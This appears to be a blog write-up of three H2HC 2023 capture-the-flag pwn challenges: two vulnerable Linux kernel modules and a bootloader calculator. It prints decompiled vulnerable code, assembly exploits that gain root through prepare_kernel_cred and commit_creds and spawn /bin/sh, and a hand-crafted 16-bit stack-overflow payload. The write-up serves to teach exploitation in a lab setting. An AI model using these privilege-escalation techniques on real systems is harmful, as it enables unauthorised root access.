<nav>
	<a href="@pathto(/writeups/)">./..</a>
</nav>

<pre id="header">
 _  _ ___ _  _  ___   ___ __ ___ ____
| || |_  ) || |/ __| |_  )  \_  )__ /
| __ |/ /| __ | (__   / / () / / |_ \
|_||_/___|_||_|\___| /___\__/___|___/</pre>

<div class="container">
	<a href="./">./</a>
	<ul>
		<li><a href="#baby_kernel">#baby_kernel</a></li>
		<li><a href="#direct">#direct</a></li>
		<li><a href="#smart_calculator">#smart_calculator</a></li>
	</ul>
</div>

<div class="container challenge" id="baby_kernel">
	<b><a href="#baby_kernel">#baby_kernel</a> (by: esoj)</b><br/>
	<strong>[PWN]</strong>

	<blockquote>
		Parece que essa VM está com o SMAP e SMEP desabilitados...<br/>
		Conecte com <code>socat FILE:`tty`,raw,echo=0 TCP:&lt;IP&gt;:&lt;PORT&gt;</code><br/>
		Use o vi para escrever o exploit.<br/>
		A flag esta em /dev/sda
	</blockquote>

	<blockquote><i>
		It looks like this VM has disabled SMAP and SMEP...<br/>
		Connect using <code>socat FILE:`tty`,raw,echo=0 TCP:&lt;IP&gt;:&lt;PORT&gt;</code><br/>
		Use vi to write the exploit<br/>
		The flag is at <code>/dev/sda</code>
	</i></blockquote>

	<h3>0x00 - Checking the files</h3>

	<p>First things first, let's take a look at the files given. They made available a zip file (<code>babykernel.zip</code>) containing a <code>Dockerfile</code>, an <code>initramfs.cpio.gz</code>, a <code>vmlinuz</code>, a <code>ynetd</code>, and a <code>run.sh</code>.</p>

	<pre class="codeblock">
$ unzip -l babykernel.zip
Archive:  babykernel.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
      940  2023-12-03 11:51   Dockerfile
   734067  2023-12-02 21:01   initramfs.cpio.gz
      297  2023-12-01 19:19   run.sh
 12212296  2023-12-01 19:19   vmlinuz
    18744  2023-12-03 11:50   ynetd
---------                     -------
 12966344                     5 files
</pre>

	<p>The <code>Dockerfile</code> comes with instructions on how to run the challenge locally. The instructions also creates a <code>flag.txt</code> with placeholder data. It becomes available on TCP port 1024.</p>

	<pre class="codeblock">
$ cat Dockerfile
# echo 'H2HC{FLAG}' &gt; flag.txt && docker build -t babykernel . && docker run -ti -p 1024:1024 babykernel

FROM debian:buster

RUN apt-get update && apt-get install -y --no-install-recommends \
        python3 procps qemu-system-i386 \
 && rm -rf /var/lib/apt/lists/

RUN useradd --create-home --shell /bin/bash ctf
WORKDIR /home/ctf

COPY ynetd /sbin/

COPY run.sh vmlinuz initramfs.cpio.gz flag.txt ynetd /home/ctf/

RUN chmod 555 /home/ctf && \
    chown -R root:root /home/ctf && \
    chmod -R 000 /home/ctf/* && \
    chmod 500 /sbin/ynetd && \
    chmod 555 /home/ctf/run.sh && \
    chmod 555 /home/ctf/vmlinuz && \
    chmod 444 /home/ctf/initramfs.cpio.gz && \
    chmod 444 /home/ctf/flag.txt

USER ctf
RUN ! find / -writable -or -user $(id -un) -or -group $(id -Gn|sed -e 's/ / -or -group /g') 2&gt; /dev/null | grep -Ev -m 1 '^(/dev/|/run/|/proc/|/sys/|/tmp|/var/tmp|/var/lock)'
USER root

EXPOSE 1024

CMD ynetd  /home/ctf/run.sh
</pre>

	<p>The file being run on the container is <code>run.sh</code>. It Simply runs qemu with the <code>kvm64</code> cpu, <code>vmlinuz</code> as the kernel, <code>initramfs.cpio.gz</code> as initrd, and the generated <code>flag.txt</code> as an hdb.</p>

	<pre class="codeblock">
$ cat run.sh
#!/bin/sh
#cd /home/ctf
qemu-system-x86_64 \
    -m 128M \
    -cpu kvm64  \
    -kernel vmlinuz \
    -initrd initramfs.cpio.gz \
    -hdb flag.txt \
    -snapshot \
    -nographic \
    -monitor /dev/null \
    -no-reboot \
    -append "console=ttyS0 nosmap  nokaslr kpti=0 nopti quiet panic=1"
</pre>

	<p>Extracting the contents of <code>initramfs.cpio.gz</code>, we get the kernel module <code>pwnme.ko</code>.</p>

	<pre class="codeblock">
$ gunzip &lt;initramfs.cpio.gz | cpio -t
.
etc
etc/motd
etc/resolv.conf
etc/init.d
etc/init.d/rcS
etc/inittab
root
usr
usr/sbin
usr/bin
sbin
bin
bin/busybox
bin/sh
pwnme.ko
init
2493 blocks
</pre>

	<h3>0x01 - Finding the vulnerability</h3>

	<p>I prefer using <i>Ida64</i> to decompile kernel modules. It is what gives me the most accurate code.</p>

	<p>We find out that the module creates a <i>proc</i> file on <code>/proc/pwnme</code>. It implements two operations on the file: <i>read</i> and <i>write</i>.</p>

	<p>The <i>read</i> operation is simple. It creates a buffer of length 32, then it reads 8 bytes into the user provided buffer. <b>From where</b> it reads is the interesting part.</p>

	<pre class="codeblock">
ssize_t pwnme_read(file *file_in, char *userbuf, size_t num_bytes, loff_t *offset)
{
	int64_t buffer[4];
	buffer[0] = 1ll;
	buffer[1] = 2ll;
	buffer[2] = 3ll;
	buffer[3] = 4ll;

	if ( num_bytes &gt; 4 ) {
		_ubsan_handle_out_of_bounds(&off_600, num_bytes);
	}
	copy_to_user(userbuf, &buffer[num_bytes], 8LL);
	return num_bytes;
}
</pre>

	<p>It gets the address to read from through the following operation: <code>buffer + num_bytes*8</code>. This means we can use the parameter <code>num_bytes</code> to somewhat control the read address. The code does a check to see if you go out of bounds, but the <code>_ubsan_handle_out_of_bounds()</code> instruction does not exit upon being called, it continues the flow of the code normally, it only logs a warning to <i>stdout</i>.</p>

	<p>The other operation is <i>write</i>.</p>

	<pre class="codeblock">
ssize_t pwnme_write(file *file_in, const char *userbuf, size_t num_bytes, loff_t *foffset)
{
	int64_t buffer[4];
	buffer[0] = 1ll;
	buffer[1] = 2ll;
	buffer[2] = 3ll;
	buffer[3] = 4ll;

	if ( num_bytes &lt;= 0xfff ) {
		if ( num_bytes &gt; 4 ) {
			_ubsan_handle_out_of_bounds(&off_5E0, num_bytes);
		}
		copy_from_user(&buffer[num_bytes], userbuf, 8LL);
	}
	return num_bytes;
}
</pre>

	<p>It basically has the same problem as the <i>read</i> implementation when calculating addresses to copy to, but it's a write operation, not read. This also means you can write 8 bytes anywhere (that is aligned in memory to the buffer). We can bypass the stack canary (omitted from these code snippets for the sake of simplicity) and write directly to the return address.</p>

	<h3>0x02 - Building the exploit</h3>

	<p>I had limited options on how to write the exploit given it was a machine with only busybox: either C using static binaries or assembly. Given the VM had no access to the internet whatsoever, the only way I found to send the exploit to the target machine was through copy pasting base64 into <i>vi</i> and decoding it. A static C binary is a few megabytes in size, and it would take a while to copy the string. Assembly on the other hand was only a few kilobytes.</p>

	<p>The first part of the exploit was easy. Create a code that opens the <code>pwnme</code> file, then overwrites it's return address so it could jump to my shellcode in user address space.</p>

	<pre class="codeblock">
_start:
	# open proc
	mov rax, 2
	lea rdi, [rip + procname]
	mov rsi, 2
	syscall
	mov r12, rax

	# execute the exploit itself
	mov rax, 1
	mov rdi, r12
	lea rsi, [rip + shellcode_addr]
	mov rdx, 8
	syscall

shellcode_addr:
	.quad shellcode

procname:
	.asciz "/proc/pwnme"

shellcode:
	...
</pre>

	<h4>First attempt</h4>

	<p>Since <a href="https://en.wikipedia.org/wiki/Supervisor_Mode_Access_Prevention" target="_blank">SMAP</a> and <a href="https://en.wikipedia.org/wiki/Control_register#SMEP" target="_blank">SMEP</a> are both disabled, I could read and execute user code through kernel. My first exploit idea was to jump from kernel to a user code and call <code>execve</code> to execute <i>/bin/sh</i>.</p>

	<pre class="codeblock">
binsh:
	.asciz "/bin/sh"

shellcode:
	mov rax, 59
	lea rdi, [rip + binsh]
	mov rsi, 0
	mov rdx, 0
	syscall
</pre>

	<p>I quickly found out that it didn't work. The problem was that doing a syscall from inside another syscall was not possible.</p>

	<h4>Second attempt</h4>

	<p>The only other idea I had was to change the current process' privileges so I could run <code>execve</code> <b>after</b> returning from the syscall.</p>

	<p>To do that on a 5.x kernel, you can create new credentials calling <code>prepare_kernel_cred</code> with 0 as a parameter, then commit these new credentials to the current process with <code>commit_creds</code>. The only problem was figuring out what were the addresses to these functions.</p>

	<p>Since I figured kaslr was disabled, I could just get the addresses once and hard code them into my exploit. My way of getting the addresses was to recreate the VM, but with a root shell instead of a user shell. I could then take a look at <code>/proc/kallsyms</code> to get the addresses.</p>

	<p>I copied the contents of <code>initramfs.cpio.gz</code> and created a new one, changing <code>/etc/inittab</code>'s command from <code>cat /etc/motd; setuidgid 1000 sh; poweroff</code> to simply <code>cat /etc/motd; sh; poweroff</code>, then reassembled the file with <code>find . | cpio -o -H newc | gzip &gt;initramfs.cpio.gz</code>. I got almost everything now.</p>

	<pre class="codeblock">
shellcode:
	mov rax, 0xffffffff810fe100 # prepare_kernel_creds
	mov rdi, 0
	call rax

	mov rdi, rax
	mov rax, 0xffffffff810fde20 # commit_creds
	call rax
</pre>

	<p>The last problem was returning from the syscall without any problems. We can't return to the normal return address because we overwrote it. What I did instead was I read and saved the <i>read</i> syscall's return address, then jumped to it at the end of my shellcode.</p>

	<pre class="codeblock">
_start:
	...

	# read return addr
	mov rax, 0
	mov rdi, r12
	lea rsi, [rip + return_addr]
	mov rdx, 8
	syscall

	...

return_addr:
	.quad return_addr

shellcode:
	...

	mov rax, [rip + return_addr]
	jmp rax
</pre>

	<h3>0x03 - Running the exploit</h3>

	<p>Sending the exploit to the machine was easy. Compile, convert to base 64 and copy it, open vi on the target machine, paste the base 64, decode and change permissions.</p>

	<pre class="codeblock">
# On the host machine
as exploit.s -o exploit.o
ld exploit.o -o exploit
base64 exploit | xclip -sel clip
</pre>

	<pre class="codeblock">
# On the target machine
cd /tmp
vi exploit.b64
# Paste the base 64 and exit vi
base64 -d exploit.b64 &gt;exploit
chmod +x exploit
</pre>

	<p>After this, you execute the exploit and it should open a shell with root privileges. To get the flag, it's as simple as running <code>cat /dev/sda</code>.</p>
</div>

<div class="container challenge" id="direct">
	<b><a href="#direct">#direct</a> (by: esoj)</b><br/>
	<strong>[PWN]</strong>

	<blockquote>
		Esse driver de kernel lhe dará um shell se você encontrar a agulha no palheiro<br/>
		Conecte com socat FILE:`tty`,raw,echo=0 TCP:&lt;IP&gt;:&lt;PORT&gt;<br/>
		Use o vi para escrever o exploit.<br/>
		A flag esta em /dev/sda, boa sorte.
	</blockquote>

	<blockquote><i>
		This kernel driver will give you a shell if you find the needle in the haystack<br/>
		Connect using <code>socat FILE:`tty`,raw,echo=0 TCP:&lt;IP&gt;:&lt;PORT&gt;</code><br/>
		Use vi to write the exploit.<br/>
		The flag is at <code>/dev/sda</code>, good luck.
	</i></blockquote>

	<h3>0x00 - Files</h3>

	<p>This challenge's files were very similar to <a href="#baby_kernel">#baby_kernel</a>'s, so we'll skip this part.</p>

	<h3>0x01 - Finding the vulnerability</h3>

	<p>Same setup. A kernel module that creates a proc file at <code>/proc/pwnme</code> with both <i>read</i> and a <i>write</i> operations implemented.</p>

	<p>The read operation copies 8 bytes from a global variable <code>ptr</code> to the user provided buffer.</p>

	<pre class="codeblock">
ssize_t pwnme_read(file *file_in, char *userbuf, size_t num_bytes, loff_t *offset)
{
	copy_to_user(userbuf, ptr, 8LL);
	return num_bytes;
}
</pre>

	<p>The write operator, on the other hand, checks for some values from the pointer given by the user. If all passes, it then changes the credentials of the current process and returns. We can then can execute a shell as root.</p>

	<pre class="codeblock">
ssize_t pwnme_write(file *file_in, const char *userbuf, size_t num_bytes, loff_t *foffset)
{
	copy_from_user(&ptr, userbuf, 8LL);
	if ( *(_OWORD *)ptr != __PAIR128__(0x1337C0FEELL, 0xDEADBEEFC00FEELL) || *(_QWORD *)ptr[2] != 0xDEADBEEFC00FEELL ) {
		return num_bytes;
	}
	commit_creds(prepare_kernel_cred(0LL));
	return num_bytes;
}
</pre>

	<p>Dissecting the if statement, there are two parts: A direct comparison of two 64 bit variables (paired as one 128 bit variable), and an indirect comparison of a 64 bit variable.</p>

	<p>So we'll need to provide a pointer that has the following properties:</p>
	<ul>
		<li>Is of type <code>int64_t userbuf[3]</code>;</li>
		<li><code>userbuf[0]</code> equals <code>0xdeadbeefc00fee</code></li>
		<li><code>userbuf[1]</code> equals <code>0x1337c0fee</code></li>
		<li><code>*(int64_t *)userbuf[2]</code> equals <code>0xdeadbeefc00fee</code></li>
	</ul>

	<h3>0x02 - Building the exploit</h3>

	<p>My solution was to craft a buffer that mimics the expected content.</p>

	<pre class="codeblock">
buffer:
	.quad 0xdeadbeefc00fee, 0x1337c0fee

buffer_addr:
	.quad buffer
</pre>

	<p>It was then as easy as sending a pointer to this structure, and call execve after returning from the read syscall.</p>

	<pre class="codeblock">
_start:
	...

	# open("/proc/pwnme", O_WRONLY);
	mov rax, 2
	lea rdi, [rip + procname]
	mov rsi, 1
	syscall
	mov r12, rax

	# write(fd, &integer, 8);
	mov rax, 1
	mov rdi, r12
	lea rsi, [rip + buffer_addr]
	lea rdx, 8 # useless
	syscall

	# execve("/bin/sh", NULL, NULL);
	mov rax, 59
	lea rdi, [rip + cmd]
	lea rsi, [rip + argv]
	mov rdx, 0
	syscall

cmd:
	.asciz "/bin/sh"

argv:
	.quad cmd, 0
</pre>

	<h3>0x03 - Running the exploit</h3>

	<p>Same thing as <a href="#baby_kernel">#baby_kernel</a>.</p>

	<!--
	<h3>0x04 - The intended way</h3>

	<p>From the description of the challenge, I figured the way I solved it was not the intend way, so I solved the challenge again.</p>

	<p>I had to find a structure in memory that had the same properties as the one I hand crafted. The way I thought was to hook GDB to the qemu and use a script to search for it.</p>

	<p>I had to add a <code>-s</code> flag to qemu's command on <code>run.sh</code>, and add <code>-p 1234:1234</code> to docker's command. Then I just had to write the script to find the memory. It went a little like this:</p>

	<pre class="codeblock"></pre>
	-->
</div>

<div class="container challenge" id="smart_calculator">
	<b><a href="#smart_calculator">#smart_calculator</a> (by: esoj)</b><br/>
	<strong>[PWN]</strong>

	<blockquote>
		Essa calculadora esta um pouco quebrada, mas será que voce consegue obter a flag?
	</blockquote>

	<blockquote><i>
		This calculator is a little broken, but can you obtain the flag?
	</i></blockquote>

	<p><sub>The author is a guess, the description didn't state who the author was.</sub></p>

	<h3>0x00 - Files</h3>

	<p>This was the most interesting challenge. We were given a bootloader and had to read the flag which was in the next sector. The challenge was to somehow load the next sector, then print its content to the screen.</p>

	<h3>0x01 - Finding the vulnerability</h3>

	<p>For this bootloader, the best disassembler was Radare2 running with the arguments <code>-m 0x7c00</code> to set memory address, and <code>-b 16</code> to define the assembly bits.</p>

	<p>The program was somewhat simple, it was an infinite loop where you could type in two one-digit numbers. It then summed the numbers and printed the results.</p>

	<p>The program also ANDs the result with 0x12, so the only possible results from the sum that could be printed were 0, 2, 16, and 18. Nothing to do with the challenge, but weird nonetheless.</p>

	<p>The first thing I looked at was how the input is implemented. It was function <code>0x7c78</code>. The code uses interrupt <i>INT 16/AH=00h</i> to get keystrokes.</p>

	<pre class="codeblock">
0x7c74       mov bx, word [0x7cf6]     # 0x500
0x7c78       mov ah, 0
0x7c7a       int 0x16
0x7c7c       call fcn.00007c5a         # putc
0x7c7f       cmp al, 0xa               # '\n'
0x7c81       je 0x7c8c
0x7c83       cmp al, 0xd               # '\r'
0x7c85       je 0x7c8c
0x7c87       mov byte [bx], al
0x7c89       inc bx
0x7c8a       jmp 0x7c78
0x7c8c       mov byte [bx], 0
0x7c8f       mov bx, 0x7cf3            # "\n\r"
0x7c92       call fcn.00007c67         # puts
0x7c95       ret
</pre>

	<p>The <a href="http://www.ctyme.com/intr/rb-1754.htm" target'_blank'>notes for <i>INT 16/AH=00h</i></a> states this: <i>On extended keyboards, this function discards any extended keystrokes, returning only when a non-extended keystroke is available.</i> This means that it will ignore any character that is not between 0x01 and 0x7f.</p>

	<p>Another thing to look at is the fact that it keeps putting the characters in memory in a buffer that starts at <code>0x500</code> until an enter is pressed. It does not have any mechanisms to limit the number of characters inputted.</p>

	<p>If we go back to main, we can see that the stack starts at <code>0x600</code>, only 256 bytes away from the input buffer. If we input enough bytes, we can overwrite the return address and jump to the input buffer and execute our payload.</p>

	<pre class="codeblock">
0x7c00       mov bp, 0x600
0x7c03       mov sp, bp
</pre>

	<h3>0x02 - Building the exploit</h3>

	<p>We can't use bytes 0x00, 0x0a, 0xdd and every byte from 0x80 to 0xff to build our payload, so we'll have to get creative. There are limits, but we can actually use a few useful instructions.</p>

	<p>We call <code>0x7c78</code> directly from main, so the return address should be at address <code>0x05fe</code> (a 2 byte address for 16 bit instructions). We also can't use byte 0x00, so our payload will have to start at <code>0x501</code>, which is a value we can actually write. That means we have 253 bytes to build our payload.</p>

	<p>The final payload has to look like the one below, but we don't have access to the mov, int, or jmp instructions.</p>

	<pre class="codeblock">
mov ah, 0x02
mov al, 1
mov ch, 0
mov cl, 2
mov dh, 0
mov bx, 0x7e00
int 0x13               # Loads next sector into memory at address bx
mov bx, 0x7e00
jmp 0x7c67             # Jumps to the already implemented puts
</pre>

	<p>We can use add, sub, push, and pop, so my idea was to use these instructions to build a more complex code on the stack by popping values. We can't use jmp, so our stack will have to stop directly after our input's last instruction, this way IP will be pointing to the beginning of the generated code.</p>

	<pre class="codeblock">
0x501                                           0x5fe         0x600
+----------------------+------------------------+-------------+
| initial payload ----&gt;|&lt;---- generated payload | return addr |
+----------------------+------------------------+-------------+
</pre>

	<p>I wrote the initial payload all by hand, so it took a while to get everything right. I had to make sure the payload didn't use any of the invalid characters, and also didn't use the higher 8 bit registers, just the 16 bit and the lower 8 bit registers.</p>

	<p>I like using GNU's assembler and linker, but for this challenge, the best option was NASM. Its raw binary output made the payload delivery a lot simpler.</p>

	<p>In the end, this was the payload:</p>

	<pre class="codeblock">
org 0x0500
bits 16

   pop ax                         # 1 byte instruction for padding
begin:
   push 0x0550                    # this payload ends at address
   pop sp                         # 0x53a, it's putting 0x16 bytes
                                  # on the stack, so the stack has
                                  # to start at address 0x550

   push 0x0178
   pop ax

   sub ax, 0x0101
   push ax
   add ax, 0x1872
   push ax
   add ax, 0x6517
   push ax
   add ax, 0x3d13
   push ax
   add ax, 0x126b
   push ax
   add ax, 0x333d
   push ax
   sub al, 0x05
   push ax
   add ax, 0x0201
   sub al, 0x06
   push ax
   sub ax, 0x0201
   add al, 0x05
   push ax
   add ax, 0x0101
   sub al, 0x06
   push ax
   add ax, 0x0104
   push ax

times 0xfe - ($-$$) db 0x01       # Fill the rest with 0x01s
dw begin                          # Overwrite the return address
db 0x0a                           # Enter at end of input
</pre>

	<h3>0x03 - Running the exploit</h3>

	<p>The delivery was simple. I found out it didn't catch the first few bytes if I just sent it directly after the connection was established, so as the challenge's notes suggested, I put a sleep before sending the payload (I actually just wrote it as <code>(read;cat payload)|...</code> instead of <code>cat payload|...</code>). <a href="https://docs.pwntools.com/en/stable/tubes.html#pwnlib.tubes.tube.tube.sendafter" target="_blank">pwntools' <code>sendafter</code></a> also works.</p>
</div>

<div class="container">
	<b><a href="#conclusion">#conclusion</a></b><br/>

	<p>Overall a very enjoyable CTF with some different challenges (I especially enjoyed the <a href="#smart_calculator">#smart_calculator</a>). Sadly, all challenges were solved after the CTF was already over as I was busy enjoying other parts of the event while it was happening.</p>

	<p>Nonetheless, congratulations to <a href="https://ctftime.org/team/926" target="_blank">GRIS</a> for the CTF.</p>
</div>
